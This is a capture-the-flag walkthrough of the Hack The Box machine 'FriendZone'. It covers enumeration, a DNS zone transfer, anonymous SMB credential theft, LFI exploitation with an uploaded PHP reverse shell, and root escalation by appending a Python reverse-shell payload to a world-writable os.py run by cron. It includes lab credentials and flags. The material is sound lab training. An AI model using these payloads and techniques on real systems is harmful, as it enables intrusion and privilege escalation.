FriendZone

Reconnaissance: NMAP

┌──(kali💀kali)-[~]
└─$ sudo nmap -sC -sV -O 10.10.10.123

21/tcp  open  ftp         vsftpd 3.0.3

22/tcp  open  ssh         OpenSSH 7.6p1 Ubuntu 4 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 a9:68:24:bc:97:1f:1e:54:a5:80:45:e7:4c:d9:aa:a0 (RSA)
|   256 e5:44:01:46:ee:7a:bb:7c:e9:1a:cb:14:99:9e:2b:8e (ECDSA)
|_  256 00:4e:1a:4f:33:e8:a0:de:86:a6:e4:2a:5f:84:61:2b (ED25519)

53/tcp  open  domain      ISC BIND 9.11.3-1ubuntu1.2 (Ubuntu Linux)
| dns-nsid: 
|_  bind.version: 9.11.3-1ubuntu1.2-Ubuntu

80/tcp  open  http        Apache httpd 2.4.29 ((Ubuntu))
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: Friend Zone Escape software

139/tcp open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)

443/tcp open  ssl/http    Apache httpd 2.4.29
| tls-alpn: 
|_  http/1.1
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: 404 Not Found
| ssl-cert: Subject: commonName=friendzone.red/organizationName=CODERED/stateOrProvinceName=CODERED/countryName=JO
| Not valid before: 2018-10-05T21:02:30
|_Not valid after:  2018-11-04T21:02:30
|_ssl-date: TLS randomness does not represent time

445/tcp open  netbios-ssn Samba smbd 4.7.6-Ubuntu (workgroup: WORKGROUP)
Aggressive OS guesses: Linux 3.2 - 4.9 (96%), Linux 3.16 (95%), ASUS RT-N56U WAP (Linux 3.4) (95%), Linux 3.18 (94%), Linux 3.1 (93%), Linux 3.2 (93%), Linux 4.10 (93%), Linux 4.2 (93%), AXIS 210A or 211 Network Camera (Linux 2.6.17) (93%), Linux 3.10 (93%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 2 hops
Service Info: Hosts: FRIENDZONE, 127.0.1.1; OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel
Host script results:
| smb-security-mode: 
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
|_clock-skew: mean: -39m59s, deviation: 1h09m15s, median: -1s
| smb-os-discovery: 
|   OS: Windows 6.1 (Samba 4.7.6-Ubuntu)
|   Computer name: friendzone
|   NetBIOS computer name: FRIENDZONE\x00
|   Domain name: \x00
|   FQDN: friendzone
|_  System time: 2024-01-08T04:58:12+02:00
|_nbstat: NetBIOS name: FRIENDZONE, NetBIOS user: <unknown>, NetBIOS MAC: <unknown> (unknown)
| smb2-time: 
|   date: 2024-01-08T02:58:12
|_  start_date: N/A
| smb2-security-mode: 
|   3:1:1: 
|_    Message signing enabled but not required

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 85.15 seconds

┌──(kali💀kali)-[~]
└─$ sudo nmap -sU -O 10.10.10.123   

53/udp    open          domain
113/udp   open|filtered auth
137/udp   open          netbios-ns
138/udp   open|filtered netbios-dgm
21847/udp open|filtered netspeak-cs
36669/udp open|filtered unknown

┌──(kali💀kali)-[~]
└─$ sudo nmap -sC -sV -p- 10.10.10.123

┌──(kali💀kali)-[~/Desktop]
└─$ nmap --script smb-enum-shares.nse -p445 10.10.10.123
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-01-08 01:24 EST
Nmap scan report for friendzoneportal.red (10.10.10.123)
Host is up (0.47s latency).

PORT    STATE SERVICE
445/tcp open  microsoft-ds

Host script results:
| smb-enum-shares: 
|   account_used: guest
|   \\10.10.10.123\Development: 
|     Type: STYPE_DISKTREE
|     Comment: FriendZone Samba Server Files
|     Users: 0
|     Max Users: <unlimited>
|     Path: C:\etc\Development
|     Anonymous access: READ/WRITE
|     Current user access: READ/WRITE
|   \\10.10.10.123\Files: 
|     Type: STYPE_DISKTREE
|     Comment: FriendZone Samba Server Files /etc/Files
|     Users: 0
|     Max Users: <unlimited>
|     Path: C:\etc\hole
|     Anonymous access: <none>
|     Current user access: <none>
|   \\10.10.10.123\IPC$: 
|     Type: STYPE_IPC_HIDDEN
|     Comment: IPC Service (FriendZone server (Samba, Ubuntu))
|     Users: 1
|     Max Users: <unlimited>
|     Path: C:\tmp
|     Anonymous access: READ/WRITE
|     Current user access: READ/WRITE
|   \\10.10.10.123\general: 
|     Type: STYPE_DISKTREE
|     Comment: FriendZone Samba Server Files
|     Users: 0
|     Max Users: <unlimited>
|     Path: C:\etc\general
|     Anonymous access: READ/WRITE
|     Current user access: READ/WRITE
|   \\10.10.10.123\print$: 
|     Type: STYPE_DISKTREE
|     Comment: Printer Drivers
|     Users: 0
|     Max Users: <unlimited>
|     Path: C:\var\lib\samba\printers
|     Anonymous access: <none>
|_    Current user access: <none>

HTTP Port 80/tcp

I always start off with enumerating HTTP first. In this case both 80 and 443 are open so we’ll start there. We can see the email is info@friendzoneportal.red. The friendzoneportal.red could be a possible domain name. We’ll keep it in mind when enumerating DNS.

http://10.10.10.123/ info@friendzoneportal.red

View the source code to see if we can find any other information. view-source:http://10.10.10.123/

┌──(kali💀kali)-[~]
└─$ sudo nano /etc/hosts
10.10.10.123    friendzoneportal.red

Gobuster:

┌──(kali💀kali)-[~]
└─$ gobuster dir -u http://10.10.10.123/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -t 20 -x php,txt

/.php                 (Status: 403) [Size: 291]
/wordpress            (Status: 301) [Size: 316] [--> http://10.10.10.123/wordpress/]
/robots.txt           (Status: 200) [Size: 13]
/.php                 (Status: 403) [Size: 291]

Nikto:

┌──(kali💀kali)-[~]
└─$ nikto -h http://10.10.10.123/

- Nikto v2.5.0
+ Target IP:          10.10.10.123
+ Target Hostname:    10.10.10.123
+ Target Port:        80
+ Start Time:         2024-01-07 22:11:15 (GMT-5)
+ Server: Apache/2.4.29 (Ubuntu)
+ /: The anti-clickjacking X-Frame-Options header is not present. See: https://developer.mozilla.org/en-US/docs/Web/HTTP/Headers/X-Frame-Options
+ /: The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type. See: https://www.netsparker.com/web-vulnerability-scanner/vulnerabilities/missing-content-type-header/
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ Apache/2.4.29 appears to be outdated (current is at least Apache/2.4.54). Apache 2.2.34 is the EOL for the 2.x branch.
+ /: Server may leak inodes via ETags, header found with file /, inode: 144, size: 577831e9005e6, mtime: gzip. See: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2003-1418
+ OPTIONS: Allowed HTTP Methods: GET, POST, OPTIONS, HEAD .
+ /icons/README: Apache default file found. See: https://www.vntweb.co.uk/apache-restricting-access-to-iconsreadme/
+ /wordpress/: Directory indexing found.
+ 8048 requests: 0 error(s) and 7 item(s) reported on remote host
+ End Time:           2024-01-07 23:13:07 (GMT-5) (3712 seconds)

Enumeration: HTTPS Port 443/tcp

Visiting the site over HTTPS (port 443) gives us an error.

https://10.10.10.123/
Not Found
The requested URL / was not found on this server.
Apache/2.4.29 (Ubuntu) Server at 10.10.10.123 Port 443

Therefore, let’s move on to enumerating DNS.

gobuster -k -u https://friendzone.red/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-small.txt -t 20 -x txt,php

/admin (Status: 301)
/js (Status: 301)

/admin is an empty dir just like /wordpress was on http:

/js has something in it:

Going to https://friendzone.red/js/js/ gives a page:

https://friendzone.red/js/js/
Testing some functions !
I'am trying not to break things !
Z2pPVHFINUs4cTE3MDQ2OTUyMzNtejFyWVlBNUhT

The source reveals it also has some comments:

<p>Testing some functions !</p><p>I'am trying not to break things !</p>
S0s4ZGFJdjFibDE1NDk5MjIwMDJIbWt2TmtKZThr<!-- dont stare too much , you will be smashed ! , it's all about times and zones ! -->

This doesn’t have much meaning to me yet. Might be an allusion to DNS zones. Or it might just be a troll.

Enumeration: ISC BIND Port 53/tcp

Try to get a domain name for the IP address using nslookup. 9.11.3–1ubuntu1.2 (DNS)

┌──(kali💀kali)-[~]
└─$ nslookup
> server 10.10.10.123
Default server: 10.10.10.123
Address: 10.10.10.123#53

We don’t get anything. However, we do have two possible domains from previous enumeration steps:

• friendzone.red from the nmap scan, and

• friendzoneportal.red from the HTTP website

Let’s try a zone transfer on both domains.

zone transfer command: host -l <dns_server-address>

┌──(kali💀kali)-[~]
└─$ host -l friendzoneportal.red 10.10.10.123
Using domain server:
Name: 10.10.10.123
Address: 10.10.10.123#53
Aliases: 

friendzoneportal.red has IPv6 address ::1
friendzoneportal.red name server localhost.
friendzoneportal.red has address 127.0.0.1
admin.friendzoneportal.red has address 127.0.0.1
files.friendzoneportal.red has address 127.0.0.1
imports.friendzoneportal.red has address 127.0.0.1
vpn.friendzoneportal.red has address 127.0.0.1

┌──(kali💀kali)-[~]
└─$ host -l friendzone.red 10.10.10.123
Using domain server:
Name: 10.10.10.123
Address: 10.10.10.123#53
Aliases: 

friendzone.red has IPv6 address ::1
friendzone.red name server localhost.
friendzone.red has address 127.0.0.1
administrator1.friendzone.red has address 127.0.0.1
hr.friendzone.red has address 127.0.0.1
uploads.friendzone.red has address 127.0.0.1

Add all the domains/subdomains in the /hosts/etc file.

┌──(kali💀kali)-[~]
└─$ sudo nano /etc/hosts   

10.10.10.123    friendzoneportal.red
10.10.10.123    friendzone.red
10.10.10.123    friendzoneportal.red
10.10.10.123    admin.friendzoneportal.red
10.10.10.123    files.friendzoneportal.red
10.10.10.123    imports.friendzoneportal.red
10.10.10.123    vpn.friendzoneportal.red
10.10.10.123    administrator1.friendzone.red
10.10.10.123    hr.friendzone.red
10.10.10.123    uploads.friendzone.red

Now we start visiting the subdomains we found. Remember that we have to visit them over both HTTP and HTTPS because we’re likely to get different results.

The following sites showed us particularly interesting results.

https://admin.friendzoneportal.red/
https://administrator1.friendzone.red/
https://uploads.friendzone.red/

I tried default credentials on the admin sites but that didn’t work. Before we run a password cracker on those two sites, let’s enumerate SMB. We might find credentials there.

Enumeration: Ports 139 / Port 445/tcp: Samba smbd 4.7.6-Ubuntu

Run smbmap to list available shares and permissions.

┌──(kali💀kali)-[~]
└─$ smbmap -H 10.10.10.123                              
                                                                                                    
[+] IP: 10.10.10.123:445        Name: friendzoneportal.red      Status: Authenticated
        Disk                                                    Permissions     Comment
        ----                                                    -----------     -------
        print$                                                  NO ACCESS       Printer Drivers
        Files                                                   NO ACCESS       FriendZone Samba Server Files /etc/Files
        general                                                 READ ONLY       FriendZone Samba Server Files
        Development                                             READ, WRITE     FriendZone Samba Server Files
        IPC$                                                    NO ACCESS       IPC Service (FriendZone server (Samba, Ubuntu))

We have READ access on the general share and READ/WRITE access on the Development share. List the content of the shares.

┌──(kali💀kali)-[~]
└─$ smbmap -H 10.10.10.123 -r

[+] IP: 10.10.10.123:445        Name: friendzoneportal.red      Status: Authenticated
        Disk                                                    Permissions     Comment
        ----                                                    -----------     -------
        print$                                                  NO ACCESS       Printer Drivers
        Files                                                   NO ACCESS       FriendZone Samba Server Files /etc/Files
        general                                                 READ ONLY       FriendZone Samba Server Files
        ./general
        dr--r--r--                0 Wed Jan 16 15:10:51 2019    .
        dr--r--r--                0 Tue Sep 13 10:56:24 2022    ..
        fr--r--r--               57 Tue Oct  9 19:52:42 2018    creds.txt
        Development                                             READ, WRITE     FriendZone Samba Server Files
        ./Development
        dr--r--r--                0 Mon Jan  8 00:58:36 2024    .
        dr--r--r--                0 Tue Sep 13 10:56:24 2022    ..
        IPC$                                                    NO ACCESS       IPC Service (FriendZone server (Samba, Ubuntu))

-R: Recursively list directories and files on all accessible shares

smbclient -N //10.10.10.123/Development

┌──(kali💀kali)-[~/Desktop]
└─$ nmap --script smb-enum-shares.nse -p445 10.10.10.123

The Development share does not contain anything, but the general directory has a file named creds.txt! Before we download the file, let’s use smbclient to view more information about the shares.

┌──(kali💀kali)-[~]
└─$ smbclient -L //10.10.10.123
Password for [WORKGROUP\kali]:

        Sharename       Type      Comment
        ---------       ----      -------
        print$          Disk      Printer Drivers
        Files           Disk      FriendZone Samba Server Files /etc/Files
        general         Disk      FriendZone Samba Server Files
        Development     Disk      FriendZone Samba Server Files
        IPC$            IPC       IPC Service (FriendZone server (Samba, Ubuntu))
Reconnecting with SMB1 for workgroup listing.

        Server               Comment
        ---------            -------

        Workgroup            Master
        ---------            -------
        WORKGROUP            FRIENDZONE

-L: look at what services are available on a server

The extra information this gives us over smbmap is the Comment column. We can see that the files in the Files share are stored in /etc/Files on the system. Therefore, there’s a good possibility that the files stored in the Development share (which we have WRITE access to) are stored in /etc/Development. We might need this piece of information in the exploitation phase.

Let’s get the creds.txt file. First, login anonymously (without a password) into the general share.

┌──(kali💀kali)-[~]
└─$ smbclient //10.10.10.123/general -N
Try "help" to get a list of possible commands.
smb: \> dir
  .                                   D        0  Wed Jan 16 15:10:51 2019
  ..                                  D        0  Tue Sep 13 10:56:24 2022
  creds.txt                           N       57  Tue Oct  9 19:52:42 2018

-N: suppresses the normal password prompt from the client to the user

Download the creds.txt file from the target machine to the attack machine.

smb: \> get creds.txt

creds for the admin THING:
admin:WORKWORKHhallelujah@#

creds for the admin THING:admin:WORKWORKHhallelujah@#

https://admin.friendzoneportal.red/
https://admin.friendzoneportal.red/login.php
Admin page is not developed yet !!! check for another one

Also doesn’t work. Next, try the credentials on the

https://administrator1.friendzone.red/

We’re in! Visit the /dashboard.php page.

https://administrator1.friendzone.red/dashboard.php
Smart photo script for friendzone corp !
* Note : we are dealing with a beginner php developer and the application is not tested yet !
image_name param is missed !
please enter it to show the image
default is image_id=a.jpg&pagename=timestamp

It seems to be a page that allows you to view images on the site. We’ll try to gain initial access through this page.

The dashboard.php page gives us instructions on how to view an image. We need to append the following to the URL.

?image_id=a.jpg&pagename=timestamp

https://administrator1.friendzone.red/dashboard.php?image_id=a.jpg&pagename=timestamp

Final Access timestamp is 1704698027

Let’s put that timestamp number in the pagename URL parameter. After we do that we no longer get a “Final Access timestamp…” message.

https://administrator1.friendzone.red/dashboard.php?image_id=a.jpg&pagename=1704698027

During our enumeration phase, we found a URL, that allows us to upload images. Let’s try and see if the images we upload there can be viewed through the dashboard page.

https://uploads.friendzone.red/

https://uploads.friendzone.red/upload.php
Uploaded successfully !
1704698226

When we successfully upload the image random.jpg we get a timestamp. Let’s use the image and timestamp on the dashboard page.

https://administrator1.friendzone.red/dashboard.php?image_id=random.jpg&pagename=1704698226

┌──(kali💀kali)-[~/Desktop]
└─$ gobuster dir -k -u https://administrator1.friendzone.red -w /usr/share/wordlists/dirbuster/directory-list-2.3-small.txt -x php

/.php                 (Status: 403) [Size: 309]
/images               (Status: 301) [Size: 349] [--> https://administrator1.friendzone.red/images/]                                                                                               
/login.php            (Status: 200) [Size: 7]
/dashboard.php        (Status: 200) [Size: 101]

Enumeration: FTP Port 21/tcp

vsftpd 3.0.3

Try the credentials on FTP.

┌──(kali💀kali)-[~]
└─$ ftp 10.10.10.123
Connected to 10.10.10.123.
220 (vsFTPd 3.0.3)
Name (10.10.10.123:kali): WORKWORKHhallelujah@#

Doesn’t work. Next, try SSH.

Enumeration: SSH Port 22/tcp

OpenSSH 7.6p1 Ubuntu 4 (Ubuntu Linux; protocol 2.0)

┌──(kali💀kali)-[~]
└─$ ssh admin@10.10.10.123
The authenticity of host '10.10.10.123 (10.10.10.123)' can't be established.
admin@10.10.10.123's password: 
Permission denied, please try again.

Also doesn’t work.

Shell as www.data

LFI Based on the recon above, there’s a likely local file include (LFI) in this page. Both parameters have potential.

Nope, it doesn’t find the image. Let’s move our focus to the pagename parameter. It seems to be running a timestamp script that generates a timestamp and outputs it on the page. Based on the way the application is currently working, my gut feeling is that it takes the filename “timestamp” and appends “.php” to it and then runs that script. Therefore, if this is vulnerable to LFI, it would be difficult to disclose sensitive files since the “.php” extension will get added to my query.

Instead, let’s try first uploading a php file and then exploiting the LFI vulnerability to output something on the page. During the enumeration phase, we found that we have READ and WRITE permissions on the Development share and that it’s likely that the files uploaded on that share are stored in the location /etc/Development (based on the Comments column).

┌──(kali💀kali)-[~/Desktop]
└─$ curl -k https://administrator1.friendzone.red/timestamp.php
Final Access timestamp is 1704699293    

Let’s create a simple test.php script that outputs the string “It’s working!” on the page.

Reverse Shell Cheat Sheetpentestmonkey

<?php
echo "It's working!";
?>

Log into the Development share.

┌──(kali💀kali)-[~/Desktop]
└─$ smbclient //10.10.10.123/Development -N
smb: \> put php-reverse-shell.php
putting file php-reverse-shell.php as \php-reverse-shell.php (3.3 kb/s) (average 3.3 kb/s)

┌──(kali💀kali)-[~/Desktop]
└─$ nc -nlvp 5555

https://administrator1.friendzone.red/dashboard.php?image_id=a.jpg&pagename=/etc/Development/php-reverse-shell

┌──(kali💀kali)-[~/Desktop]
└─$ nc -nlvp 5555
listening on [any] 5555 ...
connect to [10.10.16.4] from (UNKNOWN) [10.10.10.123] 39144
Linux FriendZone 4.15.0-36-generic #39-Ubuntu SMP Mon Sep 24 16:19:09 UTC 2018 x86_64 x86_64 x86_64 GNU/Linux
 08:47:00 up  3:50,  0 users,  load average: 0.02, 0.06, 0.02
USER     TTY      FROM             LOGIN@   IDLE   JCPU   PCPU WHAT
uid=33(www-data) gid=33(www-data) groups=33(www-data)
/bin/sh: 0: can't access tty; job control turned off
$ whoami
www-data
$ id
uid=33(www-data) gid=33(www-data) groups=33(www-data)

$ cat /etc/passwd
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
systemd-network:x:100:102:systemd Network Management,,,:/run/systemd/netif:/usr/sbin/nologin
systemd-resolve:x:101:103:systemd Resolver,,,:/run/systemd/resolve:/usr/sbin/nologin
syslog:x:102:106::/home/syslog:/usr/sbin/nologin
messagebus:x:103:107::/nonexistent:/usr/sbin/nologin
_apt:x:104:65534::/nonexistent:/usr/sbin/nologin
uuidd:x:105:109::/run/uuidd:/usr/sbin/nologin
friend:x:1000:1000:friend,,,:/home/friend:/bin/bash
sshd:x:106:65534::/run/sshd:/usr/sbin/nologin
Debian-exim:x:107:114::/var/spool/exim4:/usr/sbin/nologin
ftp:x:108:115:ftp daemon,,,:/srv/ftp:/usr/sbin/nologin
bind:x:109:116::/var/cache/bind:/usr/sbin/nologin

root:x:0:0:root:/root:/bin/bash
sync:x:4:65534:sync:/bin:/bin/sync
friend:x:1000:1000:friend,,,:/home/friend:/bin/bash

Let’s upgrade it to a better shell.

$ python -c 'import pty; pty.spawn("/bin/bash")'
www-data@FriendZone:/$ 

This gives us a partially interactive bash shell. To get a fully interactive shell, background the session (CTRL+ Z) and run the following in your terminal which tells your terminal to pass keyboard shortcuts to the shell.

www-data@FriendZone:/$ cat home/friend/user.txt
cat home/friend/user.txt
69559f0496405776adaf3d141aa188bb

Priv: www-data to friend

root:x:0:0:root:/root:/bin/bash
sync:x:4:65534:sync:/bin:/bin/sync
friend:x:1000:1000:friend,,,:/home/friend:/bin/bash

In the /var/www/ directory, there’s folders for all the different sites, as well as an sql conf file:

www-data@FriendZone:/etc/Development$ cd /var/www/ 

www-data@FriendZone:/var/www$ ls
ls
admin       friendzoneportal       html             uploads
friendzone  friendzoneportaladmin  mysql_data.conf

www-data@FriendZone:/var/www$ cat mysql_data.conf 
for development process this is the mysql creds for user friend
db_user=friend
db_pass=Agpyu12!0.213$
db_name=FZ

Those creds happen to work for friend. I can either su friend:

SU:

www-data@FriendZone:/var/www$ su friend
su friend
Password: Agpyu12!0.213$

friend@FriendZone:/var/www$ whoami
friend

friend@FriendZone:/var/www$ id
uid=1000(friend) gid=1000(friend) groups=1000(friend),4(adm),24(cdrom),30(dip),46(plugdev),111(lpadmin),112(sambashare)

SSH:

or ssh in with them:

┌──(kali💀kali)-[~]
└─$  ssh friend@10.10.10.123
friend@10.10.10.123's password: 
Welcome to Ubuntu 18.04.1 LTS (GNU/Linux 4.15.0-36-generic x86_64)
You have mail.
Last login: Thu Jan 24 01:20:15 2019 from 10.10.14.3
friend@FriendZone:~$ 

friend@FriendZone:~$ ls
user.txt

friend@FriendZone:~$ cat user.txt
69559-----------------------------

┌──(kali💀kali)-[~/Desktop]
└─$ python -m SimpleHTTPServer 5555

www-data@FriendZone:/tmp$ cd /etc/Development/

We have rwx privileges on the /etc/Development directory as www-data. So let’s upload the LinEnum script in the Development share.

┌──(kali💀kali)-[~/Desktop/7. Priv Esc]
└─$ smbclient //10.10.10.123/Development -N
Try "help" to get a list of possible commands.
smb: \> put LinEnum.sh

Give the script execute permissions.

chmod +x LinEnum.sh

I don’t seem to have execute permissions in that directory, so I’ll copy it to the tmp directory.

Navigate to the /tmp directory and try again.

cd /tmp/

chmod +x LinEnum.sh

That works, so the next step is to execute the script.

./LinEnum.sh

The results from LinEnum don’t give us anything that we could use to escalate privileges. So let’s try pspy. If you don’t have the script, you can download it from the following github repository.

GitHub - DominicBreuker/pspy: Monitor linux processes without root permissionsGitHub

Upload it and run it on the attack machine in the same way we did for LinEnum.

Priv: friend to root

It seems that the reporter.py script is getting executed every couple of minutes as a scheduled task. Let’s view the permissions we have on that file.

ls -la /opt/server_admin/

friend@FriendZone:~$ ls -la /opt/server_admin/
total 12
drwxr-xr-x 2 root root 4096 Sep 13  2022 .
drwxr-xr-x 3 root root 4096 Sep 13  2022 ..
-rwxr--r-- 1 root root  424 Jan 16  2019 reporter.py

We only have read permission. So let’s view the content of the file.

friend@FriendZone:~$ cat /opt/server_admin/reporter.py
#!/usr/bin/python

import os

to_address = "admin1@friendzone.com"
from_address = "admin2@friendzone.com"

print "[+] Trying to send email to %s"%to_address

#command = ''' mailsend -to admin2@friendzone.com -from admin1@friendzone.com -ssl -port 465 -auth -smtp smtp.gmail.co-sub scheduled results email +cc +bc -v -user you -pass "PAPAP"'''

#os.system(command)

# I need to edit the script later
# Sam ~ python developer

Here’s the soure code of the script. Most of the script is commented out so there isn’t much to do there. It does import the os module. Maybe we can hijack that. Locate the module on the machine.

friend@FriendZone:~$ locate os.py
/usr/lib/python2.7/os.py
/usr/lib/python2.7/os.pyc
/usr/lib/python2.7/dist-packages/samba/provision/kerberos.py
/usr/lib/python2.7/dist-packages/samba/provision/kerberos.pyc
/usr/lib/python2.7/encodings/palmos.py
/usr/lib/python2.7/encodings/palmos.pyc
/usr/lib/python3/dist-packages/LanguageSelector/macros.py
/usr/lib/python3.6/os.py
/usr/lib/python3.6/encodings/palmos.py

Navigate to the directory and view the permissions on the file

friend@FriendZone:~$ cd /usr/lib/python2.7

friend@FriendZone:/usr/lib/python2.7$ ls -la | grep os.py
-rwxrwxrwx  1 root   root    25910 Jan 15  2019 os.py
-rw-rw-r--  1 friend friend  25583 Jan 15  2019 os.pyc

We have rwx privileges on the os.py module! This is obviously a security misconfiguration. As a non-privileged user, I should only have read access to the script. If we add a reverse shell to the script and wait for the root owned scheduled task to run, we’ll get back a reverse shell with root privileges!

I tried accessing the os.py script using vi but the terminal was a bit screwed up. Here’s a way to fix it (courtesy of ippsec). Go to a new pane in the attack machine and enter the following command.

friend@FriendZone:/usr/lib/python2.7$ stty -a 
speed 38400 baud; rows 51; columns 97; line = 0;
intr = ^C; quit = ^\; erase = ^H; kill = ^U; eof = ^D; eol = M-^?; eol2 = M-^?; swtch = <undef>;
start = ^Q; stop = ^S; susp = ^Z; rprnt = ^R; werase = ^W; lnext = ^V; discard = ^O;
min = 1; time = 0;
-parenb -parodd -cmspar cs8 -hupcl -cstopb cread -clocal -crtscts
-ignbrk -brkint -ignpar -parmrk -inpck -istrip -inlcr -igncr icrnl -ixon -ixoff -iuclc -ixany
-imaxbel iutf8
opost -olcuc -ocrnl onlcr -onocr -onlret -ofill -ofdel nl0 cr0 tab0 bs0 vt0 ff0
isig icanon iexten echo echoe echok -echonl -noflsh -xcase -tostop -echoprt echoctl echoke -flusho
-extproc

friend@FriendZone:/usr/lib/python2.7$ stty rows 29 columns 113

Even after this, vi was still a bit glitchy, so instead, I decided to download the os.py module to my attack machine using SMB, add the reverse shell there and upload it back to the target machine. Add the following reverse shell code to the bottom of the os.py file and upload it back to the target machine.

import socket,subprocess,os;
s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);
s.connect(("10.10.16.4",1234));
dup2(s.fileno(),0); 
dup2(s.fileno(),1); 
dup2(s.fileno(),2);
p=subprocess.call(["/bin/sh","-i"]);

Setup a listener on the attack machine.

┌──(kali💀kali)-[~/Desktop/7. Priv Esc]
└─$  nc -lnvp 1234   

Wait for the scheduled task to run the reporter.py script that will in turn call the os.py module which contains our reverse shell code.

friend@FriendZone:/usr/lib/python2.7$ cat os.py

import socket,subprocess,os;
s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);
s.connect(("10.10.16.4",1234));
dup2(s.fileno(),0); 
dup2(s.fileno(),1); 
dup2(s.fileno(),2);
p=subprocess.call(["/bin/sh","-i"]);

We get back a shell running with root privileges! Grab the root.txt flag.

# whoami
root

# id
uid=0(root) gid=0(root) groups=0(root)

# cat /root/root.txt
612f35-----------------------------